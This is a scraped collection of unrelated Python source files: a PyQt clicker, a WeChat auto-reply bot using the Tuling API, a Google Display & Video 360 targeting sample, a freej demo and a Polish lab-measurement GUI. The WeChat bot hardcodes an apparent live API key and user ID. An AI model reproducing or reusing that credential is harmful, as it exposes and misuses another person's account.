update_pos(self):\n self.btn_pos_x = (self.window.window_width - self.btn_width) // 2\n self.btn_pos_y = self.window.main_text.main_text_pos_y + self.window.main_text.main_text_height + 10\n self.btn.move(self.btn_pos_x, self.btn_pos_y)\n\n def on_click(self):\n self.window.clicked += 1\n self.window.main_text.update_text()\n\n\ndef application():\n app = 
QApplication(sys.argv)\n    window = Window(app)\n\n    window.show()\n    sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n    application()\n\n","repo_name":"polterg3ist/pyqt_clicker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13111661774","text":"import itchat\nimport json\nimport requests\nfrom itchat.content import *\n\ndef getResponse(_info):\n\t#print(_info)\n\tapiUrl = \"http://openapi.tuling123.com/openapi/api/v2\"\n\tdata = {\n\t\t\"reqType\": 0,\n\t\t\"perception\": {\n\t\t\t\"inputText\": {\n\t\t\t\t\"text\": _info\n\t\t\t},\n\t\t\t\"inputImage\": {\n\t\t\t\t\"url\": _info\n\t\t\t},\n\t\t\t\"selfInfo\": {\n\t\t\t\t\"location\": {\n\t\t\t\t\t\"city\": \"重庆\",\n\t\t\t\t\t\"province\": \"重庆\",\n\t\t\t\t\t\"street\": \"解放碑\"\n\t\t\t\t}\n\t\t\t}\n\t\t},\n\t\t\"userInfo\": {\n\t\t\t\"apiKey\": \"ab2bc8ca07fe46b79842d01418e2d21e\",\n\t\t\t\"userId\": \"wyjason1220\"\n\t\t}\n\t}\n\tdata = json.dumps(data).encode(\"utf-8\") #将字典格式的data(request)编码为utf-8\n\tr = requests.post(apiUrl, data=data).json()\n\treturn r\n\n#自动回复\n# 文字\n@itchat.msg_register(TEXT)\ndef auto_reply(msg):\n\t# NickName = msg['User']['NickName']\n\t# user = itchat.search_friends(name=NickName)[0]\n\t# user.send(u\"山风大哥家的baozi:\" + getResponse(msg['Text'])['results'][0]['values']['text'])\n\tuserid = msg['FromUserName'] # 每个用户和群聊都会使用很长的ID来区分\n\ttemp=getResponse(msg['Text'])\n\n\t#回复新闻\n\t#判断是否是新闻标志类\n\tif temp['intent']['code']==10003: #是\n\t\tif temp['results'][1]['resultType']=='news':\n\t\t\tbuff1=temp['results'][0]['values']['text']\n\t\t\tnews=temp['results'][1]['values']['news']\n\t\t\tbuff2=\"\"\n\t\t\tfor new in news:\n\t\t\t\tbuff2=buff2+\"\\n标题:(\"+new['info']+\")\"+new['name']+\"\\n链接:\"+new['detailurl']\n\t\t\titchat.send(u\"山风大哥家的baozi:\" + buff1 + buff2,userid)\n\t\telse:\n\t\t\tbuff1=temp['results'][1]['values']['text']\n\t\t\tbuff2=temp['results'][0]['values']['url']\n\t\t\titchat.send(u\"山风大哥家的baozi:\"+buff1+\"\\n链接:\"+buff2,userid)\n\t#回复图片\n\telif temp['intent']['code']==10014:\n\t\tbuff1 = temp['results'][1]['values']['text']\n\t\tbuff2 = temp['results'][0]['values']['url']\n\t\titchat.send(u\"山风大哥家的baozi:\" + buff1 + \"\\n链接:\" + buff2, userid)\n\t#回复关键词\n\telif '秦岚' in msg['Text']:\n\t\treturn '秦岚(Qin Lan),1981年7月17日出生于辽宁省沈阳市,毕业于沈阳工业大学会计系,中国内地女演员、歌手。\\\n\t\t2001年,出演个人首部电视剧《大唐情史》,从而正式进入演艺圈;2002年,因在古装爱情剧《还珠格格3》中饰演陈知画而崭露头角;\\\n\t\t2003年,出演古装武侠剧《风云2》;2004年,主演古装爱情剧《护花奇缘》;2006年,出演古装励志剧《绣娘兰馨》;\\\n\t\t2007年,因在青春爱情剧《又见一帘幽梦》中饰演汪绿萍而获得更多关注;2009年,出演剧情片《南京!南京!》;\\\n\t\t2011年,凭借家庭伦理片《母语》荣获第三届英国万像国际华语电影节“最具潜力女演员奖”;2012年,凭借古装传奇片\\\n\t\t《王的盛宴》荣获第七届亚洲电影节“最佳女配角”;同年,在古装传奇剧《楚汉传奇》中饰演吕雉;2013年,秦岚推\\\n\t\t出首张个人EP《一肩之隔》;2014年,出演古装武侠剧《神雕侠侣》;2015年,在都市爱情剧《咱们相爱吧》中饰演蔡春妮;\\\n\t\t2017年5月,秦岚担当出品人的网络电影《超级APP》在广州开机;2018年7月,在古装剧《延禧攻略》中饰演富察容音。'\n\telif '山风大哥' in msg['Text']:\n\t\titchat.send(u\"山风大哥家的baozi:喏,就是下面这位小姐姐咯~\", userid)\n\t\titchat.send_image(fileDir='./images/shanfeng.gif', toUserName=userid)\n\t# 普通回复\n\telse:\n\t\titchat.send(u\"山风大哥家的baozi:\" + temp['results'][0]['values']['text'],userid)\n\n# 图片\n@itchat.msg_register(PICTURE)\ndef auto_reply(msg):\n\tNickName = msg['User']['NickName']\n\tuser = itchat.search_friends(name=NickName)[0]\n\tuser.send_image('./images/cute_pig.gif')\n\tdownload_files(msg,user) # 下载图片\n\n#语音\n# @itchat.msg_register(VOICE)\n# def auto_reply(msg):\n# \tNickName = msg['User']['NickName']\n# \tuser 
= itchat.search_friends(name=NickName)[0]\n# \tuser.send_image('./images/cute_pig.gif')\n\n#处理多媒体类消息(图片、录音、文件、视频)\n@itchat.msg_register([RECORDING,ATTACHMENT,VIDEO])\ndef download_files(msg, user=None):\n\t# itchat passes only msg to registered handlers, so user must default to None here\n\tmsg['Text'](msg['FileName']) #msg['Text']是一个文件下载函数\n\n\t#向发送者发回去\n\t\"\"\"\n\t\tsend(msg,toUserName)\n\t\tmsg:文本消息内容\n\t\t@fil@path_to_file:发送文件\n\t\t@img@path_to_img:发送图片\n\t\t@vid@path_to_video:发送视频\n\t\t\n\t\titchat.send(\"@fil@%s\" % '/tmp/test.text')\n\t\titchat.send(\"@img@%s\" % '/tmp/test.png')\n\t\titchat.send(\"@vid@%s\" % '/tmp/test.mkv')\n\t\"\"\"\n\tif user is None:\n\t\titchat.send(u\"山风大哥家的baozi:I have received this %s.\" % msg['Type'], msg['FromUserName'])\n\telse:\n\t\tuser.send(u\"山风大哥家的baozi:I have received this %s.\" % msg['Type'])\n\t#return '@%s@%s' % ({'Picture': 'img', 'Video': 'vid'}.get(msg['Type'], 'fil'), msg['FileName'])\n\n#处理好友添加请求\n@itchat.msg_register(FRIENDS)\ndef add_friend(msg):\n\t#该操作会自动将新好友的消息录入,不需要重载通讯录\n\titchat.add_friend(**msg['Text']) #**kwargs表示关键字参数,为dict\n\t#加完好友后,打招呼\n\titchat.send_msg('Nice to meet you!',msg['RecommendInfo']['UserName'])\n\n\nif __name__ == '__main__':\n\titchat.auto_login(hotReload=True)\n\t#向好友发消息\n\t#user = itchat.search_friends(name=u'xxx')[0] #将xxx换成任一好友的昵称\n\t#user.send(u\"很高兴认识你~~\")\n\t\n\t#向文件传输助手发消息\n\titchat.send('Hello,filehelper',toUserName='filehelper')\n\titchat.run()\n","repo_name":"AnRanbel/StudyPython","sub_path":"WeChatAutoReply/auto_reply.py","file_name":"auto_reply.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34001373168","text":"import argparse\nimport os\nimport sys\n\nfrom googleapiclient.errors import HttpError\n\nsys.path.insert(0, os.path.abspath('..'))\nimport samples_util\n\n\n# Declare command-line flags.\nargparser = argparse.ArgumentParser(add_help=False)\nargparser.add_argument(\n    'advertiser_id',\n    help='The ID of the parent advertiser of the line item to which the listed targeting options '\n    'are assigned.')\nargparser.add_argument(\n    'line_item_id',\n    help='The ID of the line item to which the listed targeting options are assigned.')\nargparser.add_argument(\n    '--browser_del_targeting_ops',\n    nargs='+',\n    help='The browser assigned targeting options to delete from the line item. Multiple values '\n    'can be listed after declaring the argument. Ex: \"--browser_del_targeting_ops 10001 10002 '\n    '10003\"')\nargparser.add_argument(\n    '--device_del_targeting_ops',\n    nargs='+',\n    help='The device type assigned targeting options to delete from the line item. Multiple values '\n    'can be listed after declaring the argument. Ex: \"--device_del_targeting_ops 10001 10002 '\n    '10003\"')\nargparser.add_argument(\n    '--browser_create_targeting_ops',\n    nargs='+',\n    help='The browser targeting options to assign to the line item. Multiple values can be listed '\n    'after declaring the argument. 
Ex: \"--browser_create_targeting_ops 10001 10002 10003\"')\n\n\ndef main(service, flags):\n browser_create_targeting_options = flags.browser_create_targeting_ops\n\n # Build assigned targeting option objects to create.\n if browser_create_targeting_options != None:\n create_browser_assigned_targeting_options = [{\n 'browserDetails': {\n 'targetingOptionId': targeting_id\n }\n } for targeting_id in browser_create_targeting_options]\n else:\n create_browser_assigned_targeting_options = []\n\n # Create a bulk edit request.\n bulk_edit_line_item_request = {\n 'deleteRequests': [{\n 'targetingType': 'TARGETING_TYPE_BROWSER',\n 'assignedTargetingOptionIds': flags.browser_del_targeting_ops\n }, {\n 'targetingType': 'TARGETING_TYPE_DEVICE_TYPE',\n 'assignedTargetingOptionIds': flags.device_del_targeting_ops\n }],\n 'createRequests': [{\n 'targetingType': 'TARGETING_TYPE_BROWSER',\n 'assignedTargetingOptions': create_browser_assigned_targeting_options\n }]\n }\n\n try:\n # Edit the line item targeting.\n response = service.advertisers().lineItems(\n ).bulkEditLineItemAssignedTargetingOptions(\n advertiserId=flags.advertiser_id,\n lineItemId=flags.line_item_id,\n body=bulk_edit_line_item_request).execute()\n except HttpError as e:\n print(e)\n sys.exit(1)\n\n # Check if response is empty.\n # If not, iterate over and display new assigned targeting options.\n if not response:\n print('Bulk edit request created no new AssignedTargetingOptions.')\n else:\n for assigned_targeting_option in response['createdAssignedTargetingOptions']:\n print(f'Assigned Targeting Option {assigned_targeting_option[\"name\"]} was created.')\n\n\nif __name__ == '__main__':\n # Retrieve command line arguments.\n flags = samples_util.get_arguments(sys.argv, __doc__, parents=[argparser])\n\n # Authenticate and construct service.\n service = samples_util.get_service(version='v1')\n\n main(service, flags)\n","repo_name":"googleads/googleads-displayvideo-examples","sub_path":"python/v1/bulk_edit_assigned_targeting_options.py","file_name":"bulk_edit_assigned_targeting_options.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"25530799981","text":"#!/usr/bin/env python\nimport threading\nimport freej\n\n# context and screen initialization\ncx = freej.Context()\nscr = freej.SdlScreen()\nscr.init(1024,576,32)\ncx.add_screen(scr)\n\n### declare the Trigger Controller\nclass Frame(freej.TriggerController):\n def __init__(self, *args):\n super(Frame, self).__init__(*args)\n\n ### the dispatch function is the callback\n ### it will be called at every frame\n def dispatch(self):\n ### rotate around 360 degrees, incrementing\n ### this function is called once every frame\n if self.i>360:\n self.i=0\n self.i += 1\n self.txt.set_rotate( self.i )\n return 1\n # dispatch should always return an integer value\n\n### create an instance of our Trigger Controller\nf = Frame()\n### set rotation index to zero\nf.i = 0\n### create a text layer inside the controller\nf.txt = freej.TextLayer()\nf.txt.init()\nf.txt.write(\"Hello World!\")\nf.txt.start()\ncx.add_layer(f.txt)\n\n# register it on the current context\nimport pdb; pdb.set_trace() # Start debugger - next line breaks\ncx.register_controller(f)\n\n# start running freej in a separate thread\nth = threading.Thread(target = cx.start , name = 
\"freej\")\nth.start()\n","repo_name":"rjmunro/freej-python","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"20240081081","text":"from PyQt5 import QtCore, QtGui, QtWidgets\n\n#<---------------------------\nimport matplotlib\nmatplotlib.use('Qt5Agg') # używamy QT5\n\n#----------------------->\n\n#dla ułatwienia w pisaniu do nazw zmiennych i obiektów dodane zostały odpowiednie przedrostki:\n# p2_ dla pomiaru dwóch próbek tak jak podczas standardowych ćwiczeń \n# r4_ dla pomiaru 4-punktowego (np. przy pomiarze nadprzewodnika)\n# ch20_ dla trybu recznego w którym można będzie mierzyć w seri 20 próbek\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n\n #<----glówne okno-----\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(1200, 815)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.stackedWidget = QtWidgets.QStackedWidget(self.centralwidget)\n self.stackedWidget.setGeometry(QtCore.QRect(10, 10, 1180, 750))\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Expanding)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.stackedWidget.sizePolicy().hasHeightForWidth())\n self.stackedWidget.setSizePolicy(sizePolicy)\n self.stackedWidget.setMinimumSize(QtCore.QSize(0, 0))\n self.stackedWidget.setLineWidth(5)\n self.stackedWidget.setObjectName(\"stackedWidget\")\n #-------------->\n\n#<------tryb pomiar 2 próbek----\n self.P2_tryb = QtWidgets.QWidget()\n self.P2_tryb.setObjectName(\"P2_tryb\")\n\n #<----obszary wykresów------\n self.P2_okno_wykresu_t = QtWidgets.QWidget(self.P2_tryb)\n self.P2_okno_wykresu_t.setGeometry(QtCore.QRect(40, 90, 450, 260))\n self.P2_okno_wykresu_t.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.P2_okno_wykresu_t.setObjectName(\"P2_okno_wykresu_t\")\n\n self.P2_okno_wykresu_p1 = QtWidgets.QWidget(self.P2_tryb)\n self.P2_okno_wykresu_p1.setGeometry(QtCore.QRect(40, 400, 530, 300))\n self.P2_okno_wykresu_p1.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.P2_okno_wykresu_p1.setObjectName(\"P2_okno_wykresu_p1\")\n\n self.P2_okno_wykresu_p2 = QtWidgets.QWidget(self.P2_tryb)\n self.P2_okno_wykresu_p2.setGeometry(QtCore.QRect(610, 400, 530, 300))\n self.P2_okno_wykresu_p2.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.P2_okno_wykresu_p2.setObjectName(\"P2_okno_wykresu_p2\")\n #---------------->\n\n #<-----czekboxy skala log----------\n self.P2_skala_log_t = QtWidgets.QCheckBox(self.P2_tryb)\n self.P2_skala_log_t.setGeometry(QtCore.QRect(50, 355, 141, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_skala_log_t.setFont(font)\n self.P2_skala_log_t.setObjectName(\"P2_skala_log_t\")\n\n self.P2_skala_log_p1 = QtWidgets.QCheckBox(self.P2_tryb)\n self.P2_skala_log_p1.setGeometry(QtCore.QRect(50, 705, 81, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_skala_log_p1.setFont(font)\n self.P2_skala_log_p1.setObjectName(\"P2_skala_log_p1\")\n\n self.P2_skala_log_p2 = QtWidgets.QCheckBox(self.P2_tryb)\n self.P2_skala_log_p2.setGeometry(QtCore.QRect(620, 705, 91, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_skala_log_p2.setFont(font)\n self.P2_skala_log_p2.setObjectName(\"P2_skala_log_p2\")\n #---------------------->\n\n #<------kanały temeperatura----\n 
self.P2_wybor_kanalow_tekst_t = QtWidgets.QLabel(self.P2_tryb)\n self.P2_wybor_kanalow_tekst_t.setGeometry(QtCore.QRect(330, 355, 95, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_kanalow_tekst_t.setFont(font)\n self.P2_wybor_kanalow_tekst_t.setObjectName(\"P2_wybor_kanalow_tekst_t\")\n\n self.P2_wybor_kanalow_t = QtWidgets.QComboBox(self.P2_tryb)\n self.P2_wybor_kanalow_t.setGeometry(QtCore.QRect(430, 355, 50, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_kanalow_t.setFont(font)\n self.P2_wybor_kanalow_t.setObjectName(\"P2_wybor_kanalow_t\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n self.P2_wybor_kanalow_t.addItem(\"\")\n #----------->\n #<---kanały probka 1-------------\n self.P2_wybor_kanalow_tekst_p1 = QtWidgets.QLabel(self.P2_tryb)\n self.P2_wybor_kanalow_tekst_p1.setGeometry(QtCore.QRect(200, 705, 100, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_kanalow_tekst_p1.setFont(font)\n self.P2_wybor_kanalow_tekst_p1.setObjectName(\"P2_wybor_kanalow_tekst_p1\")\n\n self.P2_wybor_kanalow_p1= QtWidgets.QComboBox(self.P2_tryb)\n self.P2_wybor_kanalow_p1.setGeometry(QtCore.QRect(300, 705, 70, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_kanalow_p1.setFont(font)\n self.P2_wybor_kanalow_p1.setObjectName(\"P2_wybor_kanalow_p1\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n self.P2_wybor_kanalow_p1.addItem(\"\")\n #----------->\n\n #<---------kanały próbka 2---------\n self.P2_wybor_kanalow_tekst_p2 = QtWidgets.QLabel(self.P2_tryb)\n self.P2_wybor_kanalow_tekst_p2.setGeometry(QtCore.QRect(770, 705, 100, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_kanalow_tekst_p2.setFont(font)\n self.P2_wybor_kanalow_tekst_p2.setObjectName(\"P2_wybor_kanalow_tekst_p2\")\n\n self.P2_wybor_kanalow_p2 = QtWidgets.QComboBox(self.P2_tryb)\n self.P2_wybor_kanalow_p2.setGeometry(QtCore.QRect(870, 705, 70, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_kanalow_p2.setFont(font)\n self.P2_wybor_kanalow_p2.setObjectName(\"P2_wybor_kanalow_p2\")\n 
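        # Hypothetical usage sketch, kept commented out because the slot named
        # here does not exist in this file; it would react to the operator
        # picking a different measurement channel for sample 2:
        # self.P2_wybor_kanalow_p2.currentIndexChanged.connect(self._on_p2_channel_changed)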
self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n self.P2_wybor_kanalow_p2.addItem(\"\")\n #---------------->\n\n #------- osi----\n self.P2_wybor_osix_tekst_p1 = QtWidgets.QLabel(self.P2_tryb)\n self.P2_wybor_osix_tekst_p1.setGeometry(QtCore.QRect(410, 705, 81, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_osix_tekst_p1.setFont(font)\n self.P2_wybor_osix_tekst_p1.setObjectName(\"P2_wybor_osix_tekst_p1\")\n\n self.P2_wybor_osix_p1 = QtWidgets.QComboBox(self.P2_tryb)\n self.P2_wybor_osix_p1.setGeometry(QtCore.QRect(490, 705, 70, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_osix_p1.setFont(font)\n self.P2_wybor_osix_p1.setObjectName(\"P2_wybor_osix_p1\")\n self.P2_wybor_osix_p1.addItem(\"\")\n self.P2_wybor_osix_p1.addItem(\"\")\n\n\n self.P2_wybor_osix_tekst_p2 = QtWidgets.QLabel(self.P2_tryb)\n self.P2_wybor_osix_tekst_p2.setGeometry(QtCore.QRect(980, 705, 81, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_osix_tekst_p2.setFont(font)\n self.P2_wybor_osix_tekst_p2.setObjectName(\"P2_wybor_osix_tekst_p2\")\n\n self.P2_wybor_osix_p2 = QtWidgets.QComboBox(self.P2_tryb)\n self.P2_wybor_osix_p2.setGeometry(QtCore.QRect(1060, 705, 70, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_wybor_osix_p2.setFont(font)\n self.P2_wybor_osix_p2.setObjectName(\"P2_wybor_osix_p2\")\n self.P2_wybor_osix_p2.addItem(\"\")\n self.P2_wybor_osix_p2.addItem(\"\")\n\n #------------->\n\n #<-----start----\n\n self.P2_start = QtWidgets.QPushButton(self.P2_tryb)\n self.P2_start.setGeometry(QtCore.QRect(970, 240, 121, 51))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.P2_start.setFont(font)\n self.P2_start.setObjectName(\"P2_start\")\n\n self.P2_reset = QtWidgets.QPushButton(self.P2_tryb)\n self.P2_reset.setGeometry(QtCore.QRect(970, 300, 120, 30))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.P2_reset.setFont(font)\n self.P2_reset.setObjectName(\"P2_reset\")\n\n self.P2_licznik = QtWidgets.QLabel(self.P2_tryb)\n self.P2_licznik.setGeometry(QtCore.QRect(970, 199, 120, 30))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_licznik.setFont(font)\n self.P2_licznik.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.P2_licznik.setFrameShape(QtWidgets.QFrame.Panel)\n self.P2_licznik.setFrameShadow(QtWidgets.QFrame.Raised)\n self.P2_licznik.setAlignment(QtCore.Qt.AlignCenter)\n self.P2_licznik.setObjectName(\"P2_licznik\")\n #-------------->\n\n #<----czestotliwość-----\n self.P2_czestotliowsc = QtWidgets.QDoubleSpinBox(self.P2_tryb)\n self.P2_czestotliowsc.setGeometry(QtCore.QRect(800, 208, 65, 22))\n self.P2_czestotliowsc.setMinimum(5.0)\n self.P2_czestotliowsc.setMaximum(300.0)\n self.P2_czestotliowsc.setSingleStep(1.0)\n self.P2_czestotliowsc.setProperty(\"value\", 5.0)\n 
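        # Equivalent spin-box setup using the more conventional Qt calls
        # (a sketch, not how this file configures the widget):
        # self.P2_czestotliowsc.setRange(5.0, 300.0)
        # self.P2_czestotliowsc.setValue(5.0)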
self.P2_czestotliowsc.setObjectName(\"P2_czestotliowsc\")\n \n self.P2_czestotliowsc_tekst = QtWidgets.QLabel(self.P2_tryb)\n self.P2_czestotliowsc_tekst.setGeometry(QtCore.QRect(540, 210, 201, 18))\n font = QtGui.QFont()\n font.setPointSize(9)\n font.setStyleStrategy(QtGui.QFont.PreferDefault)\n self.P2_czestotliowsc_tekst.setFont(font)\n self.P2_czestotliowsc_tekst.setAcceptDrops(False)\n self.P2_czestotliowsc_tekst.setAutoFillBackground(False)\n self.P2_czestotliowsc_tekst.setTextFormat(QtCore.Qt.AutoText)\n self.P2_czestotliowsc_tekst.setWordWrap(True)\n self.P2_czestotliowsc_tekst.setObjectName(\"P2_czestotliowsc_tekst\")\n #------------>\n\n #<--------automatycznie śledzenie i tempo\n self.P2_tempo = QtWidgets.QLabel(self.P2_tryb)\n self.P2_tempo.setGeometry(QtCore.QRect(850-32, 258, 48, 18))\n self.P2_tempo.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_tempo.setFont(font)\n self.P2_tempo.setObjectName(\"P2_tempo\")\n\n self.P2_tempo_tekst = QtWidgets.QLabel(self.P2_tryb)\n self.P2_tempo_tekst.setGeometry(QtCore.QRect(540, 250, 181, 36))\n font = QtGui.QFont()\n font.setPointSize(9)\n font.setStyleStrategy(QtGui.QFont.PreferDefault)\n self.P2_tempo_tekst.setFont(font)\n self.P2_tempo_tekst.setAcceptDrops(False)\n self.P2_tempo_tekst.setAutoFillBackground(False)\n self.P2_tempo_tekst.setTextFormat(QtCore.Qt.AutoText)\n self.P2_tempo_tekst.setWordWrap(True)\n self.P2_tempo_tekst.setObjectName(\"P2_tempo_tekst\")\n\n\n self.P2_sledzenie_temp_tekst = QtWidgets.QLabel(self.P2_tryb)\n self.P2_sledzenie_temp_tekst.setGeometry(QtCore.QRect(540, 306, 209, 36))\n font = QtGui.QFont()\n font.setPointSize(9)\n font.setStyleStrategy(QtGui.QFont.PreferDefault)\n self.P2_sledzenie_temp_tekst.setFont(font)\n self.P2_sledzenie_temp_tekst.setAcceptDrops(False)\n self.P2_sledzenie_temp_tekst.setAutoFillBackground(False)\n self.P2_sledzenie_temp_tekst.setTextFormat(QtCore.Qt.AutoText)\n self.P2_sledzenie_temp_tekst.setWordWrap(True)\n self.P2_sledzenie_temp_tekst.setObjectName(\"P2_sledzenie_temp_tekst\")\n\n self.P2_sledzenie_temp_wartosc = QtWidgets.QDoubleSpinBox(self.P2_tryb)\n self.P2_sledzenie_temp_wartosc.setGeometry(QtCore.QRect(800, 311, 70, 22))\n self.P2_sledzenie_temp_wartosc.setMinimum(80.0)\n self.P2_sledzenie_temp_wartosc.setMaximum(300.0)\n self.P2_sledzenie_temp_wartosc.setProperty(\"value\", 250.0)\n self.P2_sledzenie_temp_wartosc.setObjectName(\"P2_sledzenie_temp_wartosc\")\n\n self.P2_sledzenie_temp_okienko = QtWidgets.QCheckBox(self.P2_tryb)\n self.P2_sledzenie_temp_okienko.setGeometry(QtCore.QRect(750, 310, 16, 16))\n self.P2_sledzenie_temp_okienko.setText(\"\")\n self.P2_sledzenie_temp_okienko.setObjectName(\"P2_sledzenie_temp_okienko\")\n #-------------->\n\n #<---temeperatura-----\n self.P2_temperatura_tekst = QtWidgets.QLabel(self.P2_tryb)\n self.P2_temperatura_tekst.setGeometry(QtCore.QRect(540, 170, 190, 18))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_temperatura_tekst.setFont(font)\n self.P2_temperatura_tekst.setObjectName(\"P2_temperatura_tekst\")\n\n self.P2_temperatura= QtWidgets.QLabel(self.P2_tryb)\n self.P2_temperatura.setGeometry(QtCore.QRect(850-32, 170, 48, 18))\n self.P2_temperatura.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_temperatura.setFont(font)\n self.P2_temperatura.setObjectName(\"P2_temperatura\")\n #-------->\n \n #<---------moc-----\n self.P2_moc_tekst = 
QtWidgets.QLabel(self.P2_tryb)\n self.P2_moc_tekst.setGeometry(QtCore.QRect(540, 130, 120, 18))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_moc_tekst.setFont(font)\n self.P2_moc_tekst.setObjectName(\"P2_moc_tekst\")\n\n self.P2_moc = QtWidgets.QLabel(self.P2_tryb)\n self.P2_moc.setGeometry(QtCore.QRect(850-32, 130, 48, 18))\n self.P2_moc.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_moc.setFont(font)\n self.P2_moc.setObjectName(\"P2_moc\")\n\n self.P2_moc_suwak = QtWidgets.QSlider(self.P2_tryb)\n self.P2_moc_suwak.setGeometry(QtCore.QRect(910, 128, 191, 22))\n self.P2_moc_suwak.setOrientation(QtCore.Qt.Horizontal)\n self.P2_moc_suwak.setObjectName(\"P2_moc_suwak\")\n self.P2_moc_suwak.setMinimum(0)\n self.P2_moc_suwak.setMaximum(100)\n self.P2_moc_suwak.setSingleStep(1)\n self.P2_moc_suwak.setProperty(\"value\",0)\n #----->\n\n #<---zakresy-------------\n self.P2_zakres_tekst_p1 = QtWidgets.QLabel(self.P2_tryb)\n self.P2_zakres_tekst_p1.setGeometry(QtCore.QRect(200, 730, 91, 22))\n font = 